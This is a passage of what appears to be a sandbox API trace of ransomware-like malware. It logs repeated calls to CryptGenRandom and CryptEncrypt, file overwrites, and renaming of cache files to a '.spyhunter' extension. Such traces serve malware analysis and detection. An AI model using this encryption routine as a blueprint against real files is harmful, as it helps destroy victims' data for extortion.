pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.spyhunter") returned 162 [0152.099] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1.spyhunter")) returned 1 [0152.100] GetProcessHeap () returned 0x2c0000 [0152.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0152.101] GetProcessHeap () returned 0x2c0000 [0152.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0152.101] GetProcessHeap () returned 0x2c0000 [0152.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f233c0 | out: hHeap=0x2c0000) returned 1 [0152.101] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed20 | out: pbBuffer=0x57ed20) returned 1 [0152.101] GetProcessHeap () returned 0x2c0000 [0152.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0152.101] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed18*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed18*=0x30) returned 1 [0152.102] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.102] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned 152 [0152.102] StrStrW (lpFirst="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpSrch=".txt") returned 0x0 [0152.102] GetProcessHeap () returned 0x2c0000 [0152.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.102] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ecdc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ecdc*=0x18a, lpOverlapped=0x0) returned 1 [0152.103] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe76, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.103] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x18a, lpNumberOfBytesWritten=0x57ecdc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ecdc*=0x18a, lpOverlapped=0x0) returned 1 [0152.103] GetProcessHeap () returned 0x2c0000 [0152.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.103] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.104] WriteFile (in: hFile=0xb0, lpBuffer=0x57ed1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ecdc, lpOverlapped=0x0 | out: lpBuffer=0x57ed1c*, lpNumberOfBytesWritten=0x57ecdc*=0x4, lpOverlapped=0x0) returned 1 [0152.104] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ecdc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ecdc*=0x30, lpOverlapped=0x0) returned 1 [0152.104] CloseHandle (hObject=0xb0) returned 1 [0152.104] GetProcessHeap () returned 0x2c0000 [0152.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0152.104] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D.spyhunter") returned 162 [0152.104] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d.spyhunter")) returned 1 [0152.105] GetProcessHeap () returned 0x2c0000 [0152.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0152.105] GetProcessHeap () returned 0x2c0000 [0152.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0152.105] GetProcessHeap () returned 0x2c0000 [0152.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f23238 | out: hHeap=0x2c0000) returned 1 [0152.105] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed20 | out: pbBuffer=0x57ed20) returned 1 [0152.105] GetProcessHeap () returned 0x2c0000 [0152.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0152.106] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed18*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed18*=0x30) returned 1 [0152.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3130b1871a126520a8c47861efe3ed4d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.117] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D") returned 119 [0152.117] StrStrW (lpFirst="3130B1871A126520A8C47861EFE3ED4D", lpSrch=".txt") returned 0x0 [0152.117] GetProcessHeap () returned 0x2c0000 [0152.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.118] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ecdc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ecdc*=0xdc, lpOverlapped=0x0) returned 1 [0152.119] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffff24, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.119] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xdc, lpNumberOfBytesWritten=0x57ecdc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ecdc*=0xdc, lpOverlapped=0x0) returned 1 [0152.119] GetProcessHeap () returned 0x2c0000 [0152.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.119] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.119] WriteFile (in: hFile=0xb0, lpBuffer=0x57ed1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ecdc, lpOverlapped=0x0 | out: lpBuffer=0x57ed1c*, lpNumberOfBytesWritten=0x57ecdc*=0x4, lpOverlapped=0x0) returned 1 [0152.119] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ecdc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ecdc*=0x30, lpOverlapped=0x0) returned 1 [0152.119] CloseHandle (hObject=0xb0) returned 1 [0152.119] GetProcessHeap () returned 0x2c0000 [0152.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0152.119] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D.spyhunter") returned 129 [0152.120] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3130b1871a126520a8c47861efe3ed4d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3130b1871a126520a8c47861efe3ed4d.spyhunter")) returned 1 [0152.120] GetProcessHeap () returned 0x2c0000 [0152.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0152.121] GetProcessHeap () returned 0x2c0000 [0152.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0152.121] GetProcessHeap () returned 0x2c0000 [0152.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc3a28 | out: hHeap=0x2c0000) returned 1 [0152.121] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed18 | out: pbBuffer=0x57ed18) returned 1 [0152.121] GetProcessHeap () returned 0x2c0000 [0152.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0152.121] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed10*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed10*=0x30) returned 1 [0152.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\23b523c9e7746f715d33c6527c18eb9d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.122] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D") returned 119 [0152.122] StrStrW (lpFirst="23B523C9E7746F715D33C6527C18EB9D", lpSrch=".txt") returned 0x0 [0152.122] GetProcessHeap () returned 0x2c0000 [0152.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.122] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ecd4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ecd4*=0x124, lpOverlapped=0x0) returned 1 [0152.123] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffedc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.123] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x57ecd4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ecd4*=0x124, lpOverlapped=0x0) returned 1 [0152.123] GetProcessHeap () returned 0x2c0000 [0152.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.123] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.123] WriteFile (in: hFile=0xb0, lpBuffer=0x57ed14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ecd4, lpOverlapped=0x0 | out: lpBuffer=0x57ed14*, lpNumberOfBytesWritten=0x57ecd4*=0x4, lpOverlapped=0x0) returned 1 [0152.123] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ecd4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ecd4*=0x30, lpOverlapped=0x0) returned 1 [0152.123] CloseHandle (hObject=0xb0) returned 1 [0152.123] GetProcessHeap () returned 0x2c0000 [0152.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0152.123] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D.spyhunter") returned 129 [0152.123] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\23b523c9e7746f715d33c6527c18eb9d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\23b523c9e7746f715d33c6527c18eb9d.spyhunter")) returned 1 [0152.124] GetProcessHeap () returned 0x2c0000 [0152.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0152.124] GetProcessHeap () returned 0x2c0000 [0152.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0152.124] GetProcessHeap () returned 0x2c0000 [0152.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc38f0 | out: hHeap=0x2c0000) returned 1 [0152.124] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed18 | out: pbBuffer=0x57ed18) returned 1 [0152.124] GetProcessHeap () returned 0x2c0000 [0152.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0152.125] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed10*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed10*=0x30) returned 1 [0152.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1daf2884ec4dfa96ba4a58d4dbc9c406"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.126] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned 119 [0152.126] StrStrW (lpFirst="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpSrch=".txt") returned 0x0 [0152.126] GetProcessHeap () returned 0x2c0000 [0152.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.126] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ecd4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ecd4*=0x10c, lpOverlapped=0x0) returned 1 [0152.127] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffef4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.127] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x57ecd4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ecd4*=0x10c, lpOverlapped=0x0) returned 1 [0152.127] GetProcessHeap () returned 0x2c0000 [0152.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.127] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.127] WriteFile (in: hFile=0xb0, lpBuffer=0x57ed14*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ecd4, lpOverlapped=0x0 | out: lpBuffer=0x57ed14*, lpNumberOfBytesWritten=0x57ecd4*=0x4, lpOverlapped=0x0) returned 1 [0152.127] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ecd4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ecd4*=0x30, lpOverlapped=0x0) returned 1 [0152.127] CloseHandle (hObject=0xb0) returned 1 [0152.127] GetProcessHeap () returned 0x2c0000 [0152.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0152.127] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406.spyhunter") returned 129 [0152.128] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1daf2884ec4dfa96ba4a58d4dbc9c406"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1daf2884ec4dfa96ba4a58d4dbc9c406.spyhunter")) returned 1 [0152.128] GetProcessHeap () returned 0x2c0000 [0152.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0152.128] GetProcessHeap () returned 0x2c0000 [0152.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0152.129] GetProcessHeap () returned 0x2c0000 [0152.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc37b8 | out: hHeap=0x2c0000) returned 1 [0152.129] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed10 | out: pbBuffer=0x57ed10) returned 1 [0152.129] GetProcessHeap () returned 0x2c0000 [0152.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0152.129] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed08*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed08*=0x30) returned 1 [0152.129] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.130] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned 152 [0152.130] StrStrW (lpFirst="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpSrch=".txt") returned 0x0 [0152.130] GetProcessHeap () returned 0x2c0000 [0152.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.130] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eccc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57eccc*=0x194, lpOverlapped=0x0) returned 1 [0152.131] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.131] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x194, lpNumberOfBytesWritten=0x57eccc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57eccc*=0x194, lpOverlapped=0x0) returned 1 [0152.131] GetProcessHeap () returned 0x2c0000 [0152.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.131] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.131] WriteFile (in: hFile=0xb0, lpBuffer=0x57ed0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eccc, lpOverlapped=0x0 | out: lpBuffer=0x57ed0c*, lpNumberOfBytesWritten=0x57eccc*=0x4, lpOverlapped=0x0) returned 1 [0152.131] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eccc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57eccc*=0x30, lpOverlapped=0x0) returned 1 [0152.132] CloseHandle (hObject=0xb0) returned 1 [0152.132] GetProcessHeap () returned 0x2c0000 [0152.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0152.132] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973.spyhunter") returned 162 [0152.132] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973.spyhunter")) returned 1 [0152.133] GetProcessHeap () returned 0x2c0000 [0152.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0152.133] GetProcessHeap () returned 0x2c0000 [0152.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0152.133] GetProcessHeap () returned 0x2c0000 [0152.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f230b0 | out: hHeap=0x2c0000) returned 1 [0152.134] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed10 | out: pbBuffer=0x57ed10) returned 1 [0152.134] GetProcessHeap () returned 0x2c0000 [0152.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 